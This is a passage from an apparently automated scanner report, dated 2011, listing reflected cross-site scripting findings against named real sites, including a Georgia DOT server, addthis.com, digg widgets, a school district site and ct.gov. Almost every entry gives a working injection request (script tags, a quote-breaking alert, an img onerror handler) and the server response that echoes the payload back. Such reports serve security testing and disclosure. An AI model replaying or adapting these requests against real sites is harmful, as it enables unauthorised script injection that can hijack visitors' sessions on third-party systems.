Path:   /ContractsAdministration/index.cfm%27%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x000010)%3C/script%3E

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 8ec08<script>alert(1)</script>844d4e5b442 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /ContractsAdministration8ec08<script>alert(1)</script>844d4e5b442/index.cfm%27%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x000010)%3C/script%3E HTTP/1.1
Host: tomcat2.dot.state.ga.us
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 404 Not Found
Date: Sat, 30 Apr 2011 12:40:16 GMT
Content-Language: en
Server: JRun Web Server

<head><title>JRun Servlet Error</title></head><h1>404 /ContractsAdministration8ec08<script>alert(1)</script>844d4e5b442/index.cfm'"--></style></script><script>netsparker(0x000010)</script></h1><body>
...[SNIP]...

3.77. http://tomcat2.dot.state.ga.us/ContractsAdministration/index.cfm%27%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x000010)%3C/script%3E [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://tomcat2.dot.state.ga.us
Path:   /ContractsAdministration/index.cfm%27%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x000010)%3C/script%3E

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload d29f2<script>alert(1)</script>2ac18f7e295 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /ContractsAdministration/d29f2<script>alert(1)</script>2ac18f7e295/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x000010)%3C/script%3E HTTP/1.1
Host: tomcat2.dot.state.ga.us
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 404 Not Found
Date: Sat, 30 Apr 2011 12:40:17 GMT
Content-Language: en
Server: JRun Web Server

<head><title>JRun Servlet Error</title></head><h1>404 /ContractsAdministration/d29f2<script>alert(1)</script>2ac18f7e295/style></script><script>netsparker(0x000010)</script></h1><body>
/ContractsAdmi
...[SNIP]...

3.78. http://tomcat2.dot.state.ga.us/ContractsAdministration/index.cfm%27%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x000010)%3C/script%3E [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://tomcat2.dot.state.ga.us
Path:   /ContractsAdministration/index.cfm%27%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x000010)%3C/script%3E

Issue detail

The value of REST URL parameter 2 is copied into the name of an HTML tag. The payload b9c61><script>alert(1)</script>0f1e0b2f655 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /ContractsAdministration/index.cfm%27%22--%3E%3Cb9c61><script>alert(1)</script>0f1e0b2f655/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x000010)%3C/script%3E HTTP/1.1
Host: tomcat2.dot.state.ga.us
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 404 Not Found
Date: Sat, 30 Apr 2011 12:40:17 GMT
Content-Language: en
Server: JRun Web Server

<head><title>JRun Servlet Error</title></head><h1>404 /ContractsAdministration/index.cfm'"--><b9c61><script>alert(1)</script>0f1e0b2f655/style></script><script>netsparker(0x000010)</script></h1><body>
...[SNIP]...

3.79. http://tomcat2.dot.state.ga.us/ContractsAdministration/index.cfm%27%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x000010)%3C/script%3E [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://tomcat2.dot.state.ga.us
Path:   /ContractsAdministration/index.cfm%27%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x000010)%3C/script%3E

Issue detail

The value of REST URL parameter 3 is copied into the name of an HTML tag. The payload 88509><script>alert(1)</script>373ac6d3742 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /ContractsAdministration/index.cfm%27%22--%3E%3C/style%3E%3C88509><script>alert(1)</script>373ac6d3742/script%3E%3Cscript%3Enetsparker(0x000010)%3C/script%3E HTTP/1.1
Host: tomcat2.dot.state.ga.us
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 404 Not Found
Date: Sat, 30 Apr 2011 12:40:18 GMT
Content-Language: en
Server: JRun Web Server

<head><title>JRun Servlet Error</title></head><h1>404 /ContractsAdministration/index.cfm'"--></style><88509><script>alert(1)</script>373ac6d3742/script><script>netsparker(0x000010)</script></h1><body>
...[SNIP]...

3.80. http://tomcat2.dot.state.ga.us/ContractsAdministration/index.cfm%27%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x000010)%3C/script%3E [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://tomcat2.dot.state.ga.us
Path:   /ContractsAdministration/index.cfm%27%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x000010)%3C/script%3E

Issue detail

The value of REST URL parameter 4 is copied into a JavaScript expression which is not encapsulated in any quotation marks. The payload 7e73a(a)854aefedeb3 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject JavaScript commands into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /ContractsAdministration/index.cfm%27%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x000010)%3C7e73a(a)854aefedeb3/script%3E HTTP/1.1
Host: tomcat2.dot.state.ga.us
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 404 Not Found
Date: Sat, 30 Apr 2011 12:40:19 GMT
Content-Language: en
Server: JRun Web Server

<head><title>JRun Servlet Error</title></head><h1>404 /ContractsAdministration/index.cfm'"--></style></script><script>netsparker(0x000010)<7e73a(a)854aefedeb3/script></h1><body>
/ContractsAdministrat
...[SNIP]...

3.81. http://tomcat2.dot.state.ga.us/ContractsAdministration/index.cfm%27%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x000010)%3C/script%3E [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://tomcat2.dot.state.ga.us
Path:   /ContractsAdministration/index.cfm%27%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x000010)%3C/script%3E

Issue detail

The value of REST URL parameter 4 is copied into the name of an HTML tag. The payload ab28e><script>alert(1)</script>3b5dda7ad9c was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /ContractsAdministration/index.cfm%27%22--%3E%3C/style%3E%3C/ab28e><script>alert(1)</script>3b5dda7ad9c/script%3E HTTP/1.1
Host: tomcat2.dot.state.ga.us
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 404 Not Found
Date: Sat, 30 Apr 2011 12:40:19 GMT
Content-Language: en
Server: JRun Web Server

<head><title>JRun Servlet Error</title></head><h1>404 /ContractsAdministration/index.cfm'"--></style></ab28e><script>alert(1)</script>3b5dda7ad9c/script></h1><body>
/ContractsAdministration/index.cfm
...[SNIP]...

3.82. http://tomcat2.dot.state.ga.us/ContractsAdministration/index.cfm%27%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x000010)%3C/script%3E [REST URL parameter 5]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://tomcat2.dot.state.ga.us
Path:   /ContractsAdministration/index.cfm%27%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x000010)%3C/script%3E

Issue detail

The value of REST URL parameter 5 is copied into a JavaScript expression which is not encapsulated in any quotation marks. The payload dfa1f(a)36f06763a38 was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject JavaScript commands into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /ContractsAdministration/index.cfm%27%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x000010)%3C/dfa1f(a)36f06763a38 HTTP/1.1
Host: tomcat2.dot.state.ga.us
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 404 Not Found
Date: Sat, 30 Apr 2011 12:40:20 GMT
Content-Language: en
Server: JRun Web Server

<head><title>JRun Servlet Error</title></head><h1>404 /ContractsAdministration/index.cfm'"--></style></script><script>netsparker(0x000010)</dfa1f(a)36f06763a38</h1><body>
/ContractsAdministration/ind
...[SNIP]...

3.83. http://tomcat2.dot.state.ga.us/ContractsAdministration/index.cfm%27%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x000010)%3C/script%3E [REST URL parameter 5]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://tomcat2.dot.state.ga.us
Path:   /ContractsAdministration/index.cfm%27%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x000010)%3C/script%3E

Issue detail

The value of REST URL parameter 5 is copied into the HTML document as plain text between tags. The payload 3d10f<script>alert(1)</script>a7e42a6b845 was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /ContractsAdministration/index.cfm%27%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x000010)%3C/script%3E3d10f<script>alert(1)</script>a7e42a6b845 HTTP/1.1
Host: tomcat2.dot.state.ga.us
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 404 Not Found
Date: Sat, 30 Apr 2011 12:40:22 GMT
Content-Language: en
Server: JRun Web Server

<head><title>JRun Servlet Error</title></head><h1>404 /ContractsAdministration/index.cfm'"--></style></script><script>netsparker(0x000010)</script>3d10f<script>alert(1)</script>a7e42a6b845</h1><body>
...[SNIP]...

3.84. http://tomcat2.dot.state.ga.us/favicon.ico [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://tomcat2.dot.state.ga.us
Path:   /favicon.ico

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 837c1<script>alert(1)</script>125699d1a92 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /favicon.ico837c1<script>alert(1)</script>125699d1a92 HTTP/1.1
Host: tomcat2.dot.state.ga.us
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 404 Not Found
Date: Sat, 30 Apr 2011 12:39:46 GMT
Content-Language: en
Server: JRun Web Server

<head><title>JRun Servlet Error</title></head><h1>404 /favicon.ico837c1<script>alert(1)</script>125699d1a92</h1><body>
/favicon.ico837c1<script>alert(1)</script>125699d1a92</body>

3.85. http://widgets.digg.com/buttons/count [url parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://widgets.digg.com
Path:   /buttons/count

Issue detail

The value of the url request parameter is copied into the HTML document as plain text between tags. The payload 87f5c<script>alert(1)</script>9226bb4228b was submitted in the url parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /buttons/count?url=http%3A//xss.cx/2011/04/30/dork/reflected-xss-cross-site-scripting-cwe79-capec86-ghdb-nistgov.html87f5c<script>alert(1)</script>9226bb4228b HTTP/1.1
Host: widgets.digg.com
Proxy-Connection: keep-alive
Referer: http://xss.cx/2011/04/30/dork/reflected-xss-cross-site-scripting-cwe79-capec86-ghdb-nistgov.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Age: 0
Date: Sat, 30 Apr 2011 22:24:53 GMT
Via: NS-CACHE: 100
Etag: "0c33a6b654e6d62cf288ba1f458bd87ea82bf50f"
Content-Length: 181
Server: TornadoServer/0.1
Content-Type: application/json
Accept-Ranges: bytes
Cache-Control: private, max-age=599
Expires: Sat, 30 Apr 2011 22:34:52 GMT
X-CDN: Cotendo
Connection: Keep-Alive

__DBW.collectDiggs({"url": "http://xss.cx/2011/04/30/dork/reflected-xss-cross-site-scripting-cwe79-capec86-ghdb-nistgov.html87f5c<script>alert(1)</script>9226bb4228b", "diggs": 0});

3.86. http://www.addthis.com/bookmark.php [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.addthis.com
Path:   /bookmark.php

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 9002f<script>alert(1)</script>3083d4231bf was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /bookmark.php9002f<script>alert(1)</script>3083d4231bf HTTP/1.1
Host: www.addthis.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 404 Not Found
Date: Sat, 30 Apr 2011 12:29:31 GMT
Server: Apache
X-Powered-By: PHP/5.2.13
Set-Cookie: PHPSESSID=4g5qhij8k24o9p54d4j1rmf2b2; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Length: 1378
Connection: close
Content-Type: text/html; charset=UTF-8
Set-Cookie: Coyote-2-a0f0083=a0f021f:0; path=/

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Not found</title>
<l
...[SNIP]...
<strong>bookmark.php9002f<script>alert(1)</script>3083d4231bf</strong>
...[SNIP]...

3.87. http://www.addthis.com/bookmark.php [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.addthis.com
Path:   /bookmark.php

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 3976f"-alert(1)-"dd57272cd4e was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /bookmark.php3976f"-alert(1)-"dd57272cd4e HTTP/1.1
Host: www.addthis.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 404 Not Found
Date: Sat, 30 Apr 2011 12:29:31 GMT
Server: Apache
X-Powered-By: PHP/5.2.13
Set-Cookie: PHPSESSID=b1ej4hl7ucvfqmllv1kcth6j45; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Length: 1352
Connection: close
Content-Type: text/html; charset=UTF-8
Set-Cookie: Coyote-2-a0f0083=a0f021f:0; path=/

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Not found</title>
<l
...[SNIP]...
<script type="text/javascript">
var u = "/404/bookmark.php3976f"-alert(1)-"dd57272cd4e";
if (window._gat) {
var gaPageTracker = _gat._getTracker("UA-1170033-1");
gaPageTracker._setDomainName("www.addthis.com");
gaPageTracker._setCustomVar(1,"Login","False",2);
gaPageTrac
...[SNIP]...

3.88. http://www.addthis.com/bookmark.php [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.addthis.com
Path:   /bookmark.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 6936b"-alert(1)-"fb8eda3eaca was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /bookmark.php/6936b"-alert(1)-"fb8eda3eaca HTTP/1.1
Host: www.addthis.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sat, 30 Apr 2011 12:29:27 GMT
Server: Apache
X-Powered-By: PHP/5.2.13
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 96059

<!DOCTYPE html>
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>AddThis Social Bookmarking Sharing Button Widget</title>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
...[SNIP]...
<script type="text/javascript">
var u = "/bookmark.php/6936b"-alert(1)-"fb8eda3eaca";
if (window._gat) {
var gaPageTracker = _gat._getTracker("UA-1170033-1");
gaPageTracker._setDomainName("www.addthis.com");
gaPageTracker._trackPageview(u);
}
</script>
...[SNIP]...

3.89. http://www.capehenlopenschools.com/education/district/district.php [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.capehenlopenschools.com
Path:   /education/district/district.php

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload d8371<script>alert(1)</script>70cf61567a0 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /educationd8371<script>alert(1)</script>70cf61567a0/district/district.php HTTP/1.1
Host: www.capehenlopenschools.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 404 Not Found
Date: Sat, 30 Apr 2011 12:30:02 GMT
Server: Apache/2.2.14 (Ubuntu)
Set-Cookie: PHPSESSID=00bd9d2100f5ee0f8e08c9a122c0534d; path=/
Expires: Wed, 26 Feb 1997 08:21:57 GMT
Cache-Control: no-cache, no-store
Pragma: no-cache
Vary: Accept-Encoding
Content-Length: 2817
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"
   dir="ltr">
...[SNIP]...
<div style="font-style: italic; font-size: 90%;">educationd8371<script>alert(1)</script>70cf61567a0/district/district.php</div>
...[SNIP]...

3.90. http://www.capehenlopenschools.com/education/district/district.php [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.capehenlopenschools.com
Path:   /education/district/district.php

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 4a413<script>alert(1)</script>93feff35a9b was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /education/district4a413<script>alert(1)</script>93feff35a9b/district.php HTTP/1.1
Host: www.capehenlopenschools.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 404 Not Found
Date: Sat, 30 Apr 2011 12:30:04 GMT
Server: Apache/2.2.14 (Ubuntu)
Set-Cookie: PHPSESSID=86b34f1345306174fe0859e9d6644757; path=/
Expires: Wed, 26 Feb 1997 08:21:57 GMT
Cache-Control: no-cache, no-store
Pragma: no-cache
Vary: Accept-Encoding
Content-Length: 2817
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"
   dir="ltr">
...[SNIP]...
<div style="font-style: italic; font-size: 90%;">education/district4a413<script>alert(1)</script>93feff35a9b/district.php</div>
...[SNIP]...

3.91. http://www.capehenlopenschools.com/education/district/district.php [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.capehenlopenschools.com
Path:   /education/district/district.php

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload ff413<script>alert(1)</script>75feda46af was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /education/district/district.phpff413<script>alert(1)</script>75feda46af HTTP/1.1
Host: www.capehenlopenschools.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 404 Not Found
Date: Sat, 30 Apr 2011 12:30:05 GMT
Server: Apache/2.2.14 (Ubuntu)
Set-Cookie: PHPSESSID=06c7d39a42592d45dacf9ec0844bc590; path=/
Expires: Wed, 26 Feb 1997 08:21:57 GMT
Cache-Control: no-cache, no-store
Pragma: no-cache
Vary: Accept-Encoding
Content-Length: 2816
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"
   dir="ltr">
...[SNIP]...
<div style="font-style: italic; font-size: 90%;">education/district/district.phpff413<script>alert(1)</script>75feda46af</div>
...[SNIP]...

3.92. http://www.ct.gov/ctportal/cwp/view.asp [a parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.ct.gov
Path:   /ctportal/cwp/view.asp

Issue detail

The value of the a request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 29e06"><img%20src%3da%20onerror%3dalert(1)>9a33d81c68f was submitted in the a parameter. This input was echoed as 29e06"><img src=a onerror=alert(1)>9a33d81c68f in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /ctportal/cwp/view.asp?a=84329e06"><img%20src%3da%20onerror%3dalert(1)>9a33d81c68f&q=431930 HTTP/1.1
Host: www.ct.gov
Proxy-Connection: keep-alive
Referer: http://www.ct.gov/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=64328189.1304117373.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=64328189.80047175.1304117373.1304117373.1304117373.1; __utmc=64328189; __utmb=64328189.1.10.1304117373

Response

HTTP/1.1 200 OK
Connection: close
Date: Fri, 29 Apr 2011 22:50:03 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Length: 30513
Content-Type: text/html
Set-Cookie: ctportalNav%5FGID=; path=/ctportal
Set-Cookie: ctportalNav=; path=/ctportal
Set-Cookie: ctportal=LoginJumpBackTo=%2Fctportal%2Fcwp%2Fview%2Easp%3Fa%3D84329e06%22%3E%3Cimg%2520src%253da%2520onerror%253dalert%281%29%3E9a33d81c68f%26q%3D431930&AA=False&PGT=&UA=Guest&AN=&AG=&Q=CF83CBC7&ln=&TC=06108&CA=CF83CBC7&II=&TU=CF83CBC7&FN=Guest&ILO=False&rn=&NB=False&F=CE83CBC6&SSL=False&EA=&SA=False; domain=www.ct.gov; path=/ctportal
Cache-control: private


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<HTML LANG="en-us">
   <DSFHEADER>
   <!--stopindex-->
   <HEAD>

       <!--
           This site was built with PPT DSF Technology
       Dynamic S
...[SNIP]...
<a href="/ctportal/cwp/view.asp?a=84329e06"><img src=a onerror=alert(1)>9a33d81c68f&q=431930&ctportalNav=|27188|">
...[SNIP]...

3.93. http://www.ct.gov/ctportal/cwp/view.asp [a parameter]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.ct.gov
Path:   /ctportal/cwp/view.asp

Issue detail

The value of the a request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 81838'><a>16be0a1a8e1 was submitted in the a parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /ctportal/cwp/view.asp?a=84381838'><a>16be0a1a8e1&q=431930 HTTP/1.1
Host: www.ct.gov
Proxy-Connection: keep-alive
Referer: http://www.ct.gov/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
